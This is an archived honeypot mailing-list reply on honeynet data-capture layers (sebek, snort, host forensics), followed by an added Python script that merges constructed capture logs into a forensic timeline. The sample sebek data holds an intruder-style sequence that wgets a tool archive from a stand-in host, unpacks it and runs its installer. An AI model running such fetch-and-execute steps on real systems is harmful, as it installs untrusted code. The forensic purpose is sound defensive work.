Honeypots mailing list archives
Re: sebek data
From: <gconnell () middlebury edu>
Date: 29 Mar 2004 06:40:40 -0000
In-Reply-To: <20040204114011.1798.qmail () web9504 mail yahoo com>
> Is sebek the only data capture tool in a honeynet? Can the data it captures be used to do some analysis? Is it enough?
In the GenII honeynets (the ones that use sebek) described by the honeynet project, there are quite a few more data capture tools. It's just that some of them don't look quite like data capture tools. For instance, each honeypot within the honeynet is itself a data capture tool, as all changes to it are considered malicious. Also, all packets that enter the honeynet are captured by snort and logged, since all data on the honeynet is, once again, considered malicious. Sebek is just one of the "lower level" data capture tools.

Sebek: Keystrokes, commands through ssh, etc.
Snort: All network data, especially cleartext data, but also including any over-the-network attacks, etc.
Honeypots: Forensics on these can show all sorts of fun stuff, especially if the hacker isn't careful. For instance, take a look at the system log and the bash histories.

--Cleverduck
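The reply lists three capture layers (sebek keystrokes, snort alerts, the honeypot's own bash history) without showing how an analyst puts them together. The following is an added example, not part of the original thread and not Honeynet Project code: it parses a constructed sample of each source into one timeline and reports keystroke-captured commands that never reached ~/.bash_history. Assumptions: the sebek records are a hypothetical plain-text rendering ("epoch pid uid command"; real Sebek emits binary UDP records that a collector must decode first), the snort lines follow the "fast" alert format with an assumed year of 2004 and UTC timestamps, and the history file was written with HISTTIMEFORMAT set so that bash stores an "#<epoch>" line before each command.

```python
"""Merge honeynet capture layers (sebek, snort, bash history) into one timeline.

All sample data below is constructed for this example.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed sample: hypothetical text rendering of sebek keystroke records.
# Columns: epoch pid uid command. (Real Sebek: binary UDP records, decoded by a collector.)
SEBEK_RECORDS = """\
1080542400 2231 0 id
1080542412 2231 0 wget http://example.invalid/tool.tgz
1080542430 2231 0 tar xzf tool.tgz
1080542445 2231 0 ./tool/install.sh
"""

# Constructed sample: snort "fast" alert lines as logged on the honeywall.
SNORT_ALERTS = """\
03/29-06:39:55.123456  [**] [1:1000001:1] CONSTRUCTED inbound ssh to honeypot [**] [Priority: 2] {TCP} 192.0.2.10:51022 -> 10.0.0.5:22
03/29-06:40:13.654321  [**] [1:1000002:1] CONSTRUCTED outbound HTTP from honeypot [**] [Priority: 1] {TCP} 10.0.0.5:40112 -> 198.51.100.7:80
"""

# Constructed sample: ~/.bash_history written with HISTTIMEFORMAT set
# ("#<epoch>" comment line precedes each command). Two commands are absent.
BASH_HISTORY = """\
#1080542400
id
#1080542430
tar xzf tool.tgz
"""


@dataclass(order=True)
class Event:
    ts: float        # seconds since the Unix epoch, UTC
    source: str      # "sebek", "snort" or "bash_history"
    detail: str      # command text or alert summary
    actor: str = ""  # extra context (pid/uid for sebek)


def parse_sebek(text):
    """Parse the hypothetical 'epoch pid uid command' text format."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        epoch, pid, uid, cmd = line.split(maxsplit=3)
        events.append(Event(float(epoch), "sebek", cmd, f"pid={pid} uid={uid}"))
    return events


# snort fast format: MM/DD-HH:MM:SS.ffffff  [**] [gid:sid:rev] msg [**] ... {PROTO} src -> dst
SNORT_RE = re.compile(
    r"^(\d\d)/(\d\d)-(\d\d):(\d\d):(\d\d)\.(\d+)\s+\[\*\*\]\s+\[[^\]]+\]\s+"
    r"(.*?)\s+\[\*\*\].*?\{(\w+)\}\s+(\S+)\s+->\s+(\S+)"
)


def parse_snort(text, year=2004):
    """Parse snort fast alerts; the format carries no year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = SNORT_RE.match(line)
        if not m:
            continue
        mon, day, hh, mm, ss, frac, msg, proto, src, dst = m.groups()
        dt = datetime(year, int(mon), int(day), int(hh), int(mm), int(ss), tzinfo=timezone.utc)
        ts = dt.timestamp() + int(frac) / 10 ** len(frac)
        events.append(Event(ts, "snort", f"{msg} {proto} {src} -> {dst}"))
    return events


def parse_bash_history(text):
    """Parse bash history with HISTTIMEFORMAT-style '#<epoch>' stamps.

    A command with no preceding stamp gets ts=0.0 (time unknown), which sorts
    it to the head of the timeline rather than silently dropping it."""
    events, pending_ts = [], None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            pending_ts = float(line[1:])
        elif line.strip():
            events.append(Event(pending_ts if pending_ts is not None else 0.0, "bash_history", line))
            pending_ts = None
    return events


def build_timeline(*event_lists):
    """Merge every capture layer into one chronologically sorted list."""
    return sorted(e for events in event_lists for e in events)


def commands_missing_from_history(sebek_events, history_events):
    """Commands typed on the keyboard (sebek) that never reached ~/.bash_history.

    This gap is why the reply treats sebek as its own layer: shell history is an
    artefact on the compromised host, the kernel-level keystroke tap is not."""
    recorded = {e.detail for e in history_events}
    return [e.detail for e in sebek_events if e.detail not in recorded]


def format_timeline(events):
    """Render events as 'ISO-time  source  detail [actor]' lines for review."""
    lines = []
    for e in events:
        when = datetime.fromtimestamp(e.ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
        suffix = f" [{e.actor}]" if e.actor else ""
        lines.append(f"{when}  {e.source:<12}  {e.detail}{suffix}")
    return "\n".join(lines)


if __name__ == "__main__":
    sebek, snort, hist = parse_sebek(SEBEK_RECORDS), parse_snort(SNORT_ALERTS), parse_bash_history(BASH_HISTORY)
    print(format_timeline(build_timeline(sebek, snort, hist)))
    print("\nTyped but absent from bash history:", commands_missing_from_history(sebek, hist))
```

On the sample data the timeline shows the inbound ssh alert, then the typed commands, then the outbound HTTP alert that the wget produced, and the final check names the two commands that bash history alone would never have shown. Swapping the constructed strings for a real collector export, a snort alert file and a recovered history file is the only change needed.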
Current thread:
- sebek data ansiry fsktm (Feb 05)
- Re: sebek data Edward Balas (Feb 05)
- <Possible follow-ups>
- Re: sebek data gconnell (Mar 28)